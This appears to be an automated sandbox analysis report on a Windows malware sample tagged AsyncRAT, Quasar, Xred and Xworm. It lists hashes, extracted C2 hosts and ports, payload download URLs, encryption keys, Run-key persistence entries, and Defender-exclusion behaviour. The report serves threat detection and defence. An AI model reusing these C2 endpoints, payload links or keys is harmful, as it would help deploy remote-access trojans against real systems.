asyncrat | 12fce52d084a8c7efa638c88fa2307bca7c038a49fe566ebb05533cacf17efbd

max time kernel
148s
max time network
150s
platform
windows7_x64
resource
win7-20240903-en
resource tags

arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
submitted
31-01-2025 20:51

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

4363463463464363463463463.exe
Size

764KB
MD5

85e3d4ac5a6ef32fb93764c090ef32b7
SHA1

adedb0aab26d15cf96f66fda8b4cfbbdcc15ef52
SHA256

4e5cc8cb98584335400d00f0a0803c3e0202761f3fbe50bcab3858a80df255e1
SHA512

a7a037bde41bcd425be18a712e27a793185f7fde638e139bbd9d253c371cd9622385eda39cf91ab715ead2591cff5b8c9f5b31d903f138d8af7bab6a9001ccab
SSDEEP

12288:6MSApJVYG5lDLyjsb0eOzkv4R7QnvUUilQ35+6G75V9Ufbj:6nsJ39LyjbJkQFMhmC+6GD9mH

Score

10^/10

asyncrat quasar xred xworm aquarius default newoffice office04 backdoor discovery execution persistence rat spyware trojan upx vmprotect

Malware Config

Extracted

Family

xred

xred.mooo.com

Attributes

email
[email protected]
payload_url
http://freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978

https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download

https://www.dropbox.com/s/n1w4p8gc6jzo0sg/SUpdate.ini?dl=1

http://xred.site50.net/syn/SUpdate.ini

https://docs.google.com/uc?id=0BxsMXGfPIZfSVzUyaHFYVkQxeFk&export=download

https://www.dropbox.com/s/zhp1b06imehwylq/Synaptics.rar?dl=1

http://xred.site50.net/syn/Synaptics.rar

https://docs.google.com/uc?id=0BxsMXGfPIZfSTmlVYkxhSDg5TzQ&export=download

https://www.dropbox.com/s/fzj752whr3ontsm/SSLLibrary.dll?dl=1

http://xred.site50.net/syn/SSLLibrary.dll

Extracted

Family

asyncrat

Version

0.5.8

Botnet

Default

18.ip.gl.ply.gg:6606

18.ip.gl.ply.gg:7707

18.ip.gl.ply.gg:8808

18.ip.gl.ply.gg:9028

14.243.221.170:3322

2.tcp.eu.ngrok.io:19695

Mutex

HyFTucy74RnH

Attributes

delay
3
install
true
install_file
Discord.exe
install_folder
%AppData%

aes.plain

Extracted

Family

quasar

Version

1.4.1

Botnet

Office04

hilol.zapto.org:20

Mutex

11bbf22e-826e-486b-b024-adbd86228a9e

Attributes

encryption_key
7A589EDBC6A581E125BF830EF0D05FC74BB75E30
install_name
Client.exe
log_directory
Logs
reconnect_delay
3000
startup_key
ctfmon
subdirectory
SubDir

Extracted

Family

quasar

Version

1.3.0.0

Botnet

Office04

20.107.53.25:25535

Mutex

QSR_MUTEX_zQ0poF2lHhCSZKSUZ3

Attributes

encryption_key
E2xbpJ93MnABcIqioTDL
install_name
Client.exe
log_directory
Logs
reconnect_delay
3000
startup_key
Quasar Client Startup
subdirectory
SubDir

Extracted

Family

quasar

Version

1.4.1

Botnet

Aquarius

192.168.8.103:4782

192.168.8.105:4782

192.168.8.114:4782

Mutex

a198a147-9efc-419d-9539-bac2108dc109

Attributes

encryption_key
4CF458F992C472DE78F317085B34A8A1747FC32D
install_name
WindowsDataUpdater.exe
log_directory
Logs
reconnect_delay
3000
startup_key
WindowsDataUpdater
subdirectory
WinBioData

Extracted

Family

quasar

Version

1.4.1

Botnet

newoffice

117.18.7.76:3782

Mutex

d908c8ed-ea88-484e-a3d2-dcbe66ac7cfc

Attributes

encryption_key
FD2DE574AF7E363A5304DF85B3475F93A948C103
install_name
Client.exe
log_directory
Logs
reconnect_delay
3000
startup_key
Windows Client Startup
subdirectory
SubDir

Extracted

Family

xworm

Attributes

Install_directory
%AppData%
install_file
XClient.exe
pastebin_url
https://pastebin.com/raw/RpncwxSs

Signatures

AsyncRat
AsyncRAT is designed to remotely monitor and control other computers written in C#.
rat asyncrat
Asyncrat family
asyncrat

Detect Xworm Payload 3 IoCs

resource	yara_rule
behavioral1/memory/444-4946-0x0000000001200000-0x0000000001218000-memory.dmp	family_xworm
behavioral1/files/0x0003000000023a5d-5365.dat	family_xworm
behavioral1/memory/4152-5690-0x0000000000E60000-0x0000000000E78000-memory.dmp	family_xworm

Quasar RAT
Quasar is an open source Remote Access Tool.
trojan spyware quasar
Quasar family
quasar

Quasar payload 16 IoCs

resource	yara_rule
behavioral1/files/0x00110000000191fd-374.dat	family_quasar
behavioral1/memory/1908-384-0x00000000009F0000-0x0000000000D14000-memory.dmp	family_quasar
behavioral1/memory/2792-400-0x0000000000E50000-0x0000000001174000-memory.dmp	family_quasar
behavioral1/memory/2376-439-0x0000000001130000-0x0000000001454000-memory.dmp	family_quasar
behavioral1/memory/1464-465-0x0000000000110000-0x0000000000434000-memory.dmp	family_quasar
behavioral1/files/0x0007000000019263-480.dat	family_quasar
behavioral1/memory/2356-482-0x0000000000B40000-0x0000000000B9E000-memory.dmp	family_quasar
behavioral1/files/0x0005000000019618-519.dat	family_quasar
behavioral1/memory/1412-544-0x0000000000960000-0x0000000000C84000-memory.dmp	family_quasar
behavioral1/memory/2036-674-0x0000000000E30000-0x0000000001154000-memory.dmp	family_quasar
behavioral1/memory/1472-1407-0x0000000001140000-0x0000000001464000-memory.dmp	family_quasar
behavioral1/memory/2824-2209-0x0000000001150000-0x0000000001474000-memory.dmp	family_quasar
behavioral1/memory/3304-4931-0x0000000005A70000-0x0000000005D94000-memory.dmp	family_quasar
behavioral1/memory/4276-5071-0x0000000000380000-0x00000000006A4000-memory.dmp	family_quasar
behavioral1/memory/1700-5823-0x0000000000190000-0x00000000004B4000-memory.dmp	family_quasar
behavioral1/memory/5064-6555-0x00000000011C0000-0x00000000014E4000-memory.dmp	family_quasar

Xred
Xred is backdoor written in Delphi.
backdoor xred
Xred family
xred
Xworm
Xworm is a remote access trojan written in C#.
trojan rat xworm
Xworm family
xworm

Async RAT payload 2 IoCs

rat

resource	yara_rule
behavioral1/files/0x00050000000191f3-294.dat	family_asyncrat
behavioral1/files/0x0005000000019278-387.dat	family_asyncrat

Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs

Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

execution

PowerShell

T1059.001

pid	Process
3784	powershell.exe
4164	powershell.exe
4416	powershell.exe
4288	powershell.exe

Downloads MZ/PE file 16 IoCs

flow	pid	Process
33	552	._cache_4363463463464363463463463.exe
46	1140	jeditor.exe
51	552	._cache_4363463463464363463463463.exe
72	552	._cache_4363463463464363463463463.exe
100	2596	._cache_Synaptics.exe
127	552	._cache_4363463463464363463463463.exe
27	2596	._cache_Synaptics.exe
27	2596	._cache_Synaptics.exe
27	2596	._cache_Synaptics.exe
27	2596	._cache_Synaptics.exe
31	552	._cache_4363463463464363463463463.exe
31	552	._cache_4363463463464363463463463.exe
39	1212	jeditor.exe
41	1212	jeditor.exe
43	2868	WEBDOWN.EXE
123	552	._cache_4363463463464363463463463.exe

Drops startup file 2 IoCs

description	ioc	Process
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\XClient.lnk	XClient.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\XClient.lnk	XClient.exe

Executes dropped EXE 64 IoCs

pid	Process
552	._cache_4363463463464363463463463.exe
2656	Synaptics.exe
2596	._cache_Synaptics.exe
2908	Discord2.exe
2404	Discord.exe
2624	MajesticExec.exe
1908	skibidi.exe
1212	jeditor.exe
1860	temp.exe
2792	Client.exe
2316	roIrMC.exe
2868	WEBDOWN.EXE
2376	Client.exe
1140	jeditor.exe
1464	Client.exe
2356	Client-built.exe
2780	svchost.exe
2768	Aquarius.exe
776	WindowsDefenderUpdater.exe
1412	WindowsDataUpdater.exe
1048	java.exe
756	WindowsDefenderUpdater.exe
688	WindowsDataUpdater.exe
2244	WindowsDefenderUpdater.exe
1416	java.exe
1700	WindowsDefenderUpdater.exe
2036	Client.exe
1608	WindowsDataUpdater.exe
2028	WindowsDefenderUpdater.exe
2216	java.exe
2660	WindowsDefenderUpdater.exe
1148	Process not Found
2372	WindowsDefenderUpdater.exe
2932	java.exe
2760	WindowsDataUpdater.exe
2924	WindowsDefenderUpdater.exe
2092	WindowsDefenderUpdater.exe
1052	WindowsDataUpdater.exe
2480	java.exe
2284	WindowsDefenderUpdater.exe
2132	WindowsDefenderUpdater.exe
3000	WindowsDataUpdater.exe
1852	java.exe
1500	WindowsDefenderUpdater.exe
1900	WindowsDefenderUpdater.exe
1432	java.exe
1772	WindowsDataUpdater.exe
2452	WindowsDefenderUpdater.exe
472	WindowsDefenderUpdater.exe
2492	WindowsDataUpdater.exe
1536	java.exe
1532	WindowsDefenderUpdater.exe
1760	WindowsDefenderUpdater.exe
2308	java.exe
2232	WindowsDataUpdater.exe
2020	WindowsDefenderUpdater.exe
924	WindowsDefenderUpdater.exe
1684	WindowsDataUpdater.exe
2696	java.exe
1960	WindowsDefenderUpdater.exe
1268	WindowsDefenderUpdater.exe
1680	java.exe
3000	WindowsDataUpdater.exe
2500	WindowsDefenderUpdater.exe

Loads dropped DLL 64 IoCs

pid	Process
2760	4363463463464363463463463.exe
2760	4363463463464363463463463.exe
2760	4363463463464363463463463.exe
2656	Synaptics.exe
2656	Synaptics.exe
2596	._cache_Synaptics.exe
2196	cmd.exe
552	._cache_4363463463464363463463463.exe
2596	._cache_Synaptics.exe
552	._cache_4363463463464363463463463.exe
552	._cache_4363463463464363463463463.exe
776	cmd.exe
1212	jeditor.exe
2868	WEBDOWN.EXE
2596	._cache_Synaptics.exe
552	._cache_4363463463464363463463463.exe
552	._cache_4363463463464363463463463.exe
552	._cache_4363463463464363463463463.exe
2084	cmd.exe
2084	cmd.exe
2084	cmd.exe
756	WindowsDefenderUpdater.exe
756	WindowsDefenderUpdater.exe
756	WindowsDefenderUpdater.exe
756	WindowsDefenderUpdater.exe
756	WindowsDefenderUpdater.exe
756	WindowsDefenderUpdater.exe
756	WindowsDefenderUpdater.exe
2348	cmd.exe
1700	WindowsDefenderUpdater.exe
1700	WindowsDefenderUpdater.exe
1700	WindowsDefenderUpdater.exe
1700	WindowsDefenderUpdater.exe
1700	WindowsDefenderUpdater.exe
1700	WindowsDefenderUpdater.exe
1700	WindowsDefenderUpdater.exe
2268	cmd.exe
2660	WindowsDefenderUpdater.exe
2660	WindowsDefenderUpdater.exe
2660	WindowsDefenderUpdater.exe
2660	WindowsDefenderUpdater.exe
2660	WindowsDefenderUpdater.exe
2660	WindowsDefenderUpdater.exe
2660	WindowsDefenderUpdater.exe
1504	cmd.exe
2924	WindowsDefenderUpdater.exe
2924	WindowsDefenderUpdater.exe
2924	WindowsDefenderUpdater.exe
2924	WindowsDefenderUpdater.exe
2924	WindowsDefenderUpdater.exe
2924	WindowsDefenderUpdater.exe
2924	WindowsDefenderUpdater.exe
1572	cmd.exe
2284	WindowsDefenderUpdater.exe
2284	WindowsDefenderUpdater.exe
2284	WindowsDefenderUpdater.exe
2284	WindowsDefenderUpdater.exe
2284	WindowsDefenderUpdater.exe
2284	WindowsDefenderUpdater.exe
2284	WindowsDefenderUpdater.exe
764	cmd.exe
1500	WindowsDefenderUpdater.exe
1500	WindowsDefenderUpdater.exe
1500	WindowsDefenderUpdater.exe

VMProtect packed file 2 IoCs

Detects executables packed with VMProtect commercial packer.

vmprotect

resource	yara_rule
behavioral1/files/0x0006000000019280-485.dat	vmprotect
behavioral1/memory/2780-494-0x000000013F540000-0x000000013FAE3000-memory.dmp	vmprotect

Adds Run key to start application 2 TTPs 64 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Windows\CurrentVersion\Run\WindowsDataUpdater = "C:\\Windows\\system32\\WinBioData\\WindowsDataUpdater.exe"	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Windows\CurrentVersion\Run\HOME = "C:\\Windows\\system32\\javaw.exe"	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Windows\CurrentVersion\Run\javaUp = "C:\\Windows\\system32\\java.exe"	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Windows\CurrentVersion\Run\WindowsDataUpdater = "C:\\Windows\\system32\\WinBioData\\WindowsDataUpdater.exe"	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Windows\CurrentVersion\Run\javaUp = "C:\\Windows\\system32\\java.exe"	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Windows\CurrentVersion\Run\WindowsDataUpdater = "C:\\Windows\\system32\\WinBioData\\WindowsDataUpdater.exe"	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Windows\CurrentVersion\Run\WindowsDataUpdater = "C:\\Windows\\system32\\WinBioData\\WindowsDataUpdater.exe"	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Windows\CurrentVersion\Run\WindowsDataUpdater = "C:\\Windows\\system32\\WinBioData\\WindowsDataUpdater.exe"	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Windows\CurrentVersion\Run\WindowsDataUpdater = "C:\\Windows\\system32\\WinBioData\\WindowsDataUpdater.exe"	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Windows\CurrentVersion\Run\HOME = "C:\\Windows\\system32\\javaw.exe"	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Windows\CurrentVersion\Run\WindowsDataUpdater = "C:\\Windows\\system32\\WinBioData\\WindowsDataUpdater.exe"	Process not Found
Set value (str)	\REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Windows\CurrentVersion\Run\WindowsDataUpdater = "C:\\Windows\\system32\\WinBioData\\WindowsDataUpdater.exe"	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Windows\CurrentVersion\Run\javaUp = "C:\\Windows\\system32\\java.exe"	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Windows\CurrentVersion\Run\javaUp = "C:\\Windows\\system32\\java.exe"	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Windows\CurrentVersion\Run\WindowsDefenderUpdater = "C:\\Windows\\system32\\WinBioData\\WindowsDefenderUpdater.exe"	Process not Found
Set value (str)	\REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Windows\CurrentVersion\Run\javaUp = "C:\\Windows\\system32\\java.exe"	Process not Found
Set value (str)	\REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Windows\CurrentVersion\Run\javaUp = "C:\\Windows\\system32\\java.exe"	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Windows\CurrentVersion\Run\javaUp = "C:\\Windows\\system32\\java.exe"	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Windows\CurrentVersion\Run\javaUp = "C:\\Windows\\system32\\java.exe"	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Windows\CurrentVersion\Run\WindowsDataUpdater = "C:\\Windows\\system32\\WinBioData\\WindowsDataUpdater.exe"	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Windows\CurrentVersion\Run\HOME = "C:\\Windows\\system32\\javaw.exe"	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Windows\CurrentVersion\Run\WindowsDefenderUpdater = "C:\\Windows\\system32\\WinBioData\\WindowsDefenderUpdater.exe"	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Windows\CurrentVersion\Run\WindowsDefenderUpdater = "C:\\Windows\\system32\\WinBioData\\WindowsDefenderUpdater.exe"	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Windows\CurrentVersion\Run\WindowsDataUpdater = "C:\\Windows\\system32\\WinBioData\\WindowsDataUpdater.exe"	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Windows\CurrentVersion\Run\WindowsDataUpdater = "C:\\Windows\\system32\\WinBioData\\WindowsDataUpdater.exe"	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Windows\CurrentVersion\Run\javaUp = "C:\\Windows\\system32\\java.exe"	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Windows\CurrentVersion\Run\HOME = "C:\\Windows\\system32\\javaw.exe"	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Windows\CurrentVersion\Run\HOME = "C:\\Windows\\system32\\javaw.exe"	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Windows\CurrentVersion\Run\HOME = "C:\\Windows\\system32\\javaw.exe"	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Windows\CurrentVersion\Run\javaUp = "C:\\Windows\\system32\\java.exe"	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Windows\CurrentVersion\Run\WindowsDataUpdater = "C:\\Windows\\system32\\WinBioData\\WindowsDataUpdater.exe"	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Windows\CurrentVersion\Run\WindowsDefenderUpdater = "C:\\Windows\\system32\\WinBioData\\WindowsDefenderUpdater.exe"	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Windows\CurrentVersion\Run\HOME = "C:\\Windows\\system32\\javaw.exe"	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Windows\CurrentVersion\Run\HOME = "C:\\Windows\\system32\\javaw.exe"	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Windows\CurrentVersion\Run\HOME = "C:\\Windows\\system32\\javaw.exe"	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Windows\CurrentVersion\Run\WindowsDataUpdater = "C:\\Windows\\system32\\WinBioData\\WindowsDataUpdater.exe"	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Windows\CurrentVersion\Run\javaUp = "C:\\Windows\\system32\\java.exe"	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Windows\CurrentVersion\Run\javaUp = "C:\\Windows\\system32\\java.exe"	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Windows\CurrentVersion\Run\WindowsDefenderUpdater = "C:\\Windows\\system32\\WinBioData\\WindowsDefenderUpdater.exe"	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Windows\CurrentVersion\Run\javaUp = "C:\\Windows\\system32\\java.exe"	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Windows\CurrentVersion\Run\WindowsDataUpdater = "C:\\Windows\\system32\\WinBioData\\WindowsDataUpdater.exe"	Process not Found
Set value (str)	\REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Windows\CurrentVersion\Run\WindowsDataUpdater = "C:\\Windows\\system32\\WinBioData\\WindowsDataUpdater.exe"	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Windows\CurrentVersion\Run\WindowsDefenderUpdater = "C:\\Windows\\system32\\WinBioData\\WindowsDefenderUpdater.exe"	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Windows\CurrentVersion\Run\HOME = "C:\\Windows\\system32\\javaw.exe"	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Windows\CurrentVersion\Run\WindowsDefenderUpdater = "C:\\Windows\\system32\\WinBioData\\WindowsDefenderUpdater.exe"	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Windows\CurrentVersion\Run\WindowsDefenderUpdater = "C:\\Windows\\system32\\WinBioData\\WindowsDefenderUpdater.exe"	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Windows\CurrentVersion\Run\WindowsDefenderUpdater = "C:\\Windows\\system32\\WinBioData\\WindowsDefenderUpdater.exe"	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Windows\CurrentVersion\Run\HOME = "C:\\Windows\\system32\\javaw.exe"	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Windows\CurrentVersion\Run\javaUp = "C:\\Windows\\system32\\java.exe"	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Windows\CurrentVersion\Run\WindowsDataUpdater = "C:\\Windows\\system32\\WinBioData\\WindowsDataUpdater.exe"	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Windows\CurrentVersion\Run\WindowsDefenderUpdater = "C:\\Windows\\system32\\WinBioData\\WindowsDefenderUpdater.exe"	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Windows\CurrentVersion\Run\javaUp = "C:\\Windows\\system32\\java.exe"	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Windows\CurrentVersion\Run\HOME = "C:\\Windows\\system32\\javaw.exe"	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Windows\CurrentVersion\Run\javaUp = "C:\\Windows\\system32\\java.exe"	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Windows\CurrentVersion\Run\WindowsDataUpdater = "C:\\Windows\\system32\\WinBioData\\WindowsDataUpdater.exe"	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Windows\CurrentVersion\Run\WindowsDataUpdater = "C:\\Windows\\system32\\WinBioData\\WindowsDataUpdater.exe"	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Windows\CurrentVersion\Run\HOME = "C:\\Windows\\system32\\javaw.exe"	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Windows\CurrentVersion\Run\HOME = "C:\\Windows\\system32\\javaw.exe"	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Windows\CurrentVersion\Run\WindowsDataUpdater = "C:\\Windows\\system32\\WinBioData\\WindowsDataUpdater.exe"	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Windows\CurrentVersion\Run\HOME = "C:\\Windows\\system32\\javaw.exe"	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Windows\CurrentVersion\Run\WindowsDataUpdater = "C:\\Windows\\system32\\WinBioData\\WindowsDataUpdater.exe"	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Windows\CurrentVersion\Run\javaUp = "C:\\Windows\\system32\\java.exe"	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Windows\CurrentVersion\Run\HOME = "C:\\Windows\\system32\\javaw.exe"	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Windows\CurrentVersion\Run\WindowsDefenderUpdater = "C:\\Windows\\system32\\WinBioData\\WindowsDefenderUpdater.exe"	reg.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 12 IoCs

Web Service

T1102

flow	ioc
119	pastebin.com
129	pastebin.com
27	raw.githubusercontent.com
31	raw.githubusercontent.com
111	pastebin.com
113	pastebin.com
117	pastebin.com
136	pastebin.com
26	raw.githubusercontent.com
92	2.tcp.eu.ngrok.io
110	pastebin.com
115	pastebin.com

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
53	ip-api.com

Drops file in System32 directory 64 IoCs

description	ioc	Process
File created	C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe	cmd.exe
File created	C:\Windows\system32\WinBioData\WindowsDataUpdater.exe	cmd.exe
File opened for modification	C:\Windows\system32\WinBioData\WindowsDataUpdater.exe	cmd.exe
File opened for modification	C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe	cmd.exe
File opened for modification	C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe	cmd.exe
File opened for modification	C:\Windows\system32\WinBioData\WindowsDataUpdater.exe	cmd.exe
File created	C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe	cmd.exe
File created	C:\Windows\system32\WinBioData\WindowsDataUpdater.exe	cmd.exe
File opened for modification	C:\Windows\system32\WinBioData\WindowsDataUpdater.exe	cmd.exe
File created	C:\Windows\system32\WinBioData\WindowsDataUpdater.exe	cmd.exe
File opened for modification	C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe	cmd.exe
File created	C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe	cmd.exe
File created	C:\Windows\system32\WinBioData\WindowsDataUpdater.exe	cmd.exe
File created	C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe	cmd.exe
File opened for modification	C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe	cmd.exe
File opened for modification	C:\Windows\system32\java.exe	cmd.exe
File created	C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe	cmd.exe
File created	C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe	cmd.exe
File created	C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe	cmd.exe
File opened for modification	C:\Windows\system32\WinBioData\WindowsDataUpdater.exe	cmd.exe
File created	C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe	cmd.exe
File created	C:\Windows\system32\WinBioData\WindowsDataUpdater.exe	cmd.exe
File opened for modification	C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe	cmd.exe
File opened for modification	C:\Windows\system32\WinBioData\WindowsDataUpdater.exe	cmd.exe
File opened for modification	C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe	cmd.exe
File opened for modification	C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe	cmd.exe
File opened for modification	C:\Windows\system32\WinBioData\WindowsDataUpdater.exe	cmd.exe
File opened for modification	C:\Windows\system32\WinBioData\WindowsDataUpdater.exe	cmd.exe
File created	C:\Windows\system32\WinBioData\WindowsDataUpdater.exe	cmd.exe
File created	C:\Windows\system32\WinBioData\WindowsDataUpdater.exe	cmd.exe
File created	C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe	cmd.exe
File opened for modification	C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe	cmd.exe
File opened for modification	C:\Windows\system32\WinBioData\WindowsDataUpdater.exe	cmd.exe
File created	C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe	cmd.exe
File created	C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe	cmd.exe
File opened for modification	C:\Windows\system32\WinBioData\WindowsDataUpdater.exe	cmd.exe
File opened for modification	C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe	cmd.exe
File opened for modification	C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe	cmd.exe
File created	C:\Windows\system32\WinBioData\WindowsDataUpdater.exe	cmd.exe
File opened for modification	C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe	cmd.exe
File opened for modification	C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe	cmd.exe
File created	C:\Windows\system32\WinBioData\WindowsDataUpdater.exe	cmd.exe
File opened for modification	C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe	cmd.exe
File opened for modification	C:\Windows\system32\WinBioData\WindowsDataUpdater.exe	cmd.exe
